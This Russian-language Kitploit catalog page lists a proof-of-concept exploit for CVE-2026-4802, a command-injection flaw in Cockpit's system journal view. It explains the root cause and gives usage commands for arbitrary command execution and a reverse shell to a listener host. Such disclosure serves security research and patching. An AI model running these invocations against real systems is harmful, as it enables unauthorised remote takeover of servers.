Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4802 — Доказательство концепции эксплуатации для CVE-2026-4802, уязвимости внедрения команд в интерфейсе системных журналов Cockpit, позволяющей выполнение произвольных команд и получение обратных оболочек. | Kitploit
Инструменты/GitHubGitHub/hakaioffsec/cve-2026-4802
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

Доказательство концепции эксплуатации для CVE-2026-4802, уязвимости внедрения команд в интерфейсе системных журналов Cockpit, позволяющей выполнение произвольных команд и получение обратных оболочек.

Репозиторий
413 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4802 - Удаленное выполнение кода через внедрение команд в Cockpit

Эксплойт-доказательство концепции для CVE-2026-4802, удаленного выполнения кода через внедрение команд в интерфейсе системных журналов Cockpit (loadServiceFilters())

Установка

Соберите и запустите уязвимое окружение:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

Использование

root@kitploit:~
# Проверка уязвимости цели
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# Выполнение произвольных команд
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# Обратная оболочка
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

Уязвимые версии

  • Cockpit (непатченные версии с pkg/systemd/logsJournal.jsx)

Первопричина

Функция loadServiceFilters() в pkg/systemd/logsJournal.jsx формирует shell-команды, объединяя массивы в строки с экранированием только пробелов, перед передачей их в /bin/bash -ec. Управляемые пользователем параметры из фрагмента URL страницы журналов (например, --since=) попадают в этот путь выполнения кода без санитизации, что позволяет внедрять метасимволы оболочки, такие как подстановка команд ($(...)).

Отказ от ответственности

Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этой программой.

QuimeraX Intelligence

QuimeraX Intelligence — это передовая платформа EASM и киберразведки, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа проактивно отслеживает, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быстрое реагирование на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчеты, если их системы оказываются уязвимыми, что позволяет им предпринять защитные меры. узнать больше

Hakai Security

Hakai Security — это компания в сфере кибербезопасности, основанная профессионалами в области безопасности, стремящаяся к техническому совершенству. Мы предлагаем индивидуальные решения в области безопасности, включая продвинутое тестирование на проникновение, реалистичные Red Team-симуляции и практики безопасной разработки для проактивной защиты активов наших клиентов от evolving киберугроз.

Ссылки

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
Скачать инструмент